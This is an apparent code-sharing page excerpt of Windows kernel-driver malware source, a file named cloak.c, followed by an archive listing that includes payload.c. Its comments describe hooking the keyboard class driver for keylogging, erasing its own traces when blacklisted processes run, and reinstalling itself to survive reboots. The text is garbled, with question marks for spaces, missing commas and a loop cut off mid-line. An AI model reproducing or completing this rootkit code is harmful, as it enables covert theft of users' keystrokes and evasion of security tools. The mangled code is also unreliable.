//!!!THIS?CODE?FULLY?WORKING!!!?SURE!!!!!!!!!!!!!!!!!!!!!!!!!!!!


#include?“cloak.h“

#define?TOUPPER_DELTA?（‘a‘?-?‘A‘）

void?PrepOnBoot（PVOID?pParameter）;
void?PrepOnShutdown（PVOID?pParameter）;
void?CreateRandName（PWCHAR?pRandDrvName?ULONG?length）;

BOOL?mystrcmp（const?WCHAR*?prefix?WCHAR*?testStr?ULONG?lengthGiven?PARSEMETHOD?parseMethod）{
	lengthGiven?>>=?1;
	if?（（NULL?==?prefix）?||?（NULL?==?testStr））{
		return?FALSE;
	}
	ULONG?prefixLength?=?0;
	SIZE_T?j?=?0;
	while?（0?!=?prefix[prefixLength]）{
		prefixLength++;
	}
	if?（prefixLength?<=?lengthGiven）{
		if?（parseMethod?==?METHOD_END）{
			j?=?lengthGiven?-?prefixLength;
		}

		SIZE_T?i?=?0;
		for?（;?j?			for?（i?=?0;?i?				if?（（testStr[i?+?j]?>?64）?&&?（testStr[i?+?j]?					if?（prefix[i]?!=?testStr[i?+?j]?+?（WCHAR）32）{
						break;
					}
				}
				else{
					if?（prefix[i]?!=?testStr[i?+?j]）{
						break;
					}
				}
			}
			if?（i?>=?（prefixLength））{
				return?TRUE;
			}
		}
		return?FALSE;
	}
	return?FALSE;
}

void?InitThread（PVOID?pStartContext）{
	DbgPrint（“Hello?from?InitThread“）;
	ExQueueWorkItem（pStartContext?DelayedWorkQueue）;
	PsTerminateSystemThread（0x0）;
}

///This?is?the?main?thread?responsible?for?both?cloaking?and?persistence.
///At?the?beginning?we?do?some?keylogger?initialization.
///Then?we?check?if?any?blacklisted?processes?are?existing.?If?not?we?repeat?until?we?detect?a?blacklisted
///process.?If?so?all?driver?evidence?will?be?deleted.
///Then?we?perform?a?passive?wait?on?the?first?blacklisted?process?we?find.
///Once?the?wait?is?satisfied?（process?terminated）?we?install?us?again?in?the?system?so?we?will?be?started?at?next?boot.
void?SenseThread（PVOID?pStartContext）{
	UNREFERENCED_PARAMETER（pStartContext）;
	DbgPrint（“Hello?from?SenseThread“）;
	LARGE_INTEGER?interval;
	NTSTATUS?ntstatus?=?STATUS_UNSUCCESSFUL;
	PUNICODE_STRING?pProcessName;
	UNICODE_STRING?uKbdDrvName;
	PEPROCESS?pEprocess;

	PDRIVER_object?pKbdDrvObj?=?NULL;
	interval.QuadPart?=?-1500000;
??
	InitializeListHead（&（g_pKbdHookInfo->queueListHead））;
	KeInitializeSpinLock（&（g_pKbdHookInfo->queueSpinLock））;?
	KeInitializeSemaphore（&（g_pKbdHookInfo->queueSemaphore）?0?MAXLONG）;

	///Try?to?directly?access?the?keyboard?class?driver
	RtlInitUnicodeString（&uKbdDrvName?L“\\Driver\\kbdclass“）;
	for?（;;）{
		ntstatus?=?ObReferenceobjectByName（&uKbdDrvName?OBJ_KERNEL_HANDLE?|?OBJ_CASE_INSENSITIVE?NULL?0?IoDriverobjectType?KernelMode?NULL?&pKbdDrvObj）;
		if?（NT_SUCCESS（ntstatus））{
			break;
		}
		KeDelayExecutionThread（KernelMode?FALSE?&interval）;
	}


	BOOL?isPatched?=?FALSE;
	PETHREAD?		pEthread;
	for?（;;）{
		pEprocess?=?NULL;
		pProcessName?=?NULL;
		pEthread?=?NULL;
		DbgPrint（“object?not?opened?（0x%lX）?starting?next?iteration.“?ntstatus）;
		///In?our?situation?a?polling?approach?is?much?easier?than?issuing?a?NtQuerySystemInformation?call.

?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件???????15664??2014-09-21?19:42??cloak.c
?????文件?????????153??2014-08-07?01:07??cloak.h
?????文件???????82064??2014-09-21?20:00??drvtricks.h
?????文件????????8380??2014-09-21?19:48??main.c
?????文件???????12045??2014-09-21?19:56??payload.c
?????文件?????????311??2014-09-21?19:58??payload.h